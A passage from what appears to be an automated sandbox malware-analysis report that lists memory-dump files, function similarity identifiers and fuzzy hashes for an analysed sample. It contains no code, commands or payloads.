                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: [
                                    • API String ID: 0-784033777
                                    • Opcode ID: f1a1104a99e7d97227cb9761e32d0d60a4dff6aab0cee9c56999b63c2fa9cd8a
                                    • Instruction ID: c2a622b9bccb227db98985d4470700d41b4d6f013c73187d2f6531a255cd268c
                                    • Opcode Fuzzy Hash: f1a1104a99e7d97227cb9761e32d0d60a4dff6aab0cee9c56999b63c2fa9cd8a
                                    • Instruction Fuzzy Hash: 9CB148719083917FDB378A2288D377ABBD8EF55304F1AC52DF8C6C6181EB65D8848B52
                                    Function 0065B1A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: islower
                                    • String ID: $
                                    • API String ID: 3326879001-3993045852
                                    • Opcode ID: c7bfa1dfb3d16157a530f8e6aae6d2394b6ad0d0820624b4b4e4ec53874544e0
                                    • Instruction ID: 4cd648c50a9abc5b52345594c0c89667c5f1aa7cc9e73e2ccbd454befbb4dd00
                                    • Opcode Fuzzy Hash: c7bfa1dfb3d16157a530f8e6aae6d2394b6ad0d0820624b4b4e4ec53874544e0
                                    • Instruction Fuzzy Hash: 636103306087458BC7148F68C88027FFBE3AFC5316F149A2DEC969B395E770C9498B42